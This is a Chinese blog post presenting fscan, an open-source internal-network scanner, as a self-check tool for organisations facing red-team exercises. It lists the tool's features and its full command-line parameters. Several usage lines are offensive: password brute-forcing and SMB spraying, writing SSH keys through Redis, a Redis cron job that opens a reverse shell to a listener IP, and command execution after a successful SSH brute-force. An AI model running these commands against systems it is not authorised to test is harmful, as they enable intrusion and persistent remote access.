主机漏洞扫描工具有哪些,内网安全漏洞扫描工具fscan

最近几年,经常会开展一些HW行动,大的单位或者有钱有经费的单位会找团队来做HW的防范服务,普通单位没钱没经费,怎么办?

这里分享一款快捷、简单的安全漏洞扫描工具fscan,普通人都能使用,简单检测一下单位内部系统的安全漏洞。免费的,开源的。就一个小文件,4M多一点。

fscan是一款用go语言编写的开源工具,一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

按照软件官方的说法,该工具支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis 批量写公钥、计划任务反弹 shell、读取 win 网卡信息、web 指纹识别、web 漏洞扫描、netbios 探测、域控识别等功能

主要功能

1.信息搜集:

  • 存活探测(icmp)
  • 端口扫描

2.爆破功能:

  • 各类服务爆破(ssh、smb等)
  • 数据库密码爆破(mysql、mssql、redis、psql等)

3.系统信息、漏洞扫描:

  • netbios探测、域控识别
  • 获取目标网卡信息
  • 高危漏洞扫描(ms17010等)

4.Web探测功能:

  • webtitle探测
  • web指纹识别(常见cms、oa框架等)
  • web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

  • redis写公钥或写计划任务
  • ssh命令执行

6.其他功能:

  • 文件保存

有经验的可以自己编译,我们普通人就直接下载编译好的工具使用就可以,下载地址在最后。

使用比较简单,命令行下运行就可

简单用法

fscan.exe-h192.168.1.1/24(默认使用全部模块)fscan.exe-h192.168.1.1/16(B段扫描)

其他用法

fscan.exe-h192.168.1.1/24-np-no-nopoc(跳过存活检测、不保存文件、跳过webpoc扫描)fscan.exe-h192.168.1.1/24-rfid_rsa.pub(redis写公钥)fscan.exe-h192.168.1.1/24-rs192.168.1.1:6666(redis计划任务反弹shell)fscan.exe-h192.168.1.1/24-cwhoami(ssh爆破成功后,命令执行)fscan.exe-h192.168.1.1/24-mssh-p2222(指定模块ssh和端口)fscan.exe-h192.168.1.1/24-pwdfpwd.txt-userfusers.txt(加载指定文件的用户名、密码来进行爆破)fscan.exe-h192.168.1.1/24-o/tmp/1.txt(指定扫描结果保存路径,默认保存在当前路径)fscan.exe-h192.168.1.1/8(A段的192.x.x.1和192.x.x.254,方便快速查看网段信息)fscan.exe-h192.168.1.1/24-msmb-pwdpassword(smb密码碰撞)fscan.exe-h192.168.1.1/24-mms17010(指定模块)fscan.exe-hfip.txt(以文件导入)

完整参数

  • -c string
  • ssh命令执行
  • -cookie string
  • 设置cookie
  • -debug int
  • 多久没响应,就打印当前进度(default 60)
  • -domain string
  • smb爆破模块时,设置域名
  • -h string
  • 目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  • -hf string
  • 读取文件中的目标
  • -hn string
  • 扫描时,要跳过的ip: -hn 192.168.1.1/24
  • -m string
  • 设置扫描模式: -m ssh (default “all”)
  • -no
  • 扫描结果不保存到文件中
  • -nobr
  • 跳过sql、ftp、ssh等的密码爆破
  • -nopoc
  • 跳过web poc扫描
  • -np
  • 跳过存活探测
  • -num int
  • web poc 发包速率 (default 20)
  • -o string
  • 扫描结果保存到哪 (default “result.txt”)
  • -p string
  • 设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default “21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017”)
  • -pa string
  • 新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
  • -path string
  • fcgi、smb romote file path
  • -ping
  • 使用ping代替icmp进行存活探测
  • -pn string
  • 扫描时要跳过的端口,as: -pn 445
  • -pocname string
  • 指定web poc的模糊名字, -pocname weblogic
  • -proxy string
  • 设置代理, -proxy http://127.0.0.1:8080
  • -user string
  • 指定爆破时的用户名
  • -userf string
  • 指定爆破时的用户名文件
  • -pwd string
  • 指定爆破时的密码
  • -pwdf string
  • 指定爆破时的密码文件
  • -rf string
  • 指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
  • -rs string
  • redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
  • -silent
  • 静默扫描,适合cs扫描时不回显
  • -sshkey string
  • ssh连接时,指定ssh私钥
  • -t int
  • 扫描线程 (default 600)
  • -time int
  • 端口扫描超时时间 (default 3)
  • -u string
  • 指定Url扫描
  • -uf string
  • 指定Url文件扫描
  • -wt int
  • web访问超时时间 (default 5)

测试截图:

主机漏洞扫描工具有哪些,内网安全漏洞扫描工具fscan

图片来源网络

源码链接:

https://github.com/shadow1ng/fscan

派优网部分新闻资讯、展示的图片素材等内容均为用户自发上传(部分报媒/平媒内容转载自网络合作媒体),仅供学习交流。用户通过本站上传、发布任何内容的知识产权归属用户或原始著作权人所有。如有侵犯您的版权,请联系我们一经核实,立即删除。并对发布账号进行封禁。
(0)
派大星的头像派大星

相关推荐

返回顶部